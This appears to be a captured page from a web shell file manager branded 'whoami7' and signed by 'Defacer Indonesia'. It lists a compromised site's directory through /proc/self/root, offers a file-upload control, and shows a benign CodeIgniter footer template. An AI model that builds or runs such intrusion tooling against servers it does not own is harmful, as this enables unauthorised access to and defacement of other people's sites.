whoami7 - Manager
:
/
proc
/
self
/
root
/
home
/
papecmvm
/
public_html
/
application
/
views
/
Web
/
Upload File:
files >> //proc/self/root/home/papecmvm/public_html/application/views/Web/footer.php
<?php $CI =& get_instance();?> <section id="footer"> <div class="container-fluid"> <div class="col-sm-3"> <h2>quick links </h2> <div class="footer-links"> <ul> <?php $CI->menucreate('[quicklinks]') ;?> </ul> </div> </div> <div class="col-sm-3"> <h2>for support call</h2> <p>xxx-xxx-xxxx</p> <h2>email</h2> <p>xxx@xxx.com</p> </div> <div class="col-sm-3"> <h2>address</h2> <p>address goes here</p> </div> <div class="col-sm-3"> <h2>get social</h2> </div> </div> </section> <script src="<?php echo base_url(); ?>bootstrap/js/bootstrap.min.js"></script> <script type="text/javascript"> $(document).ready(function() { $('.defaultForm').bootstrapValidator(); }); </script> </body> </html>
Copyright ©2021 || Defacer Indonesia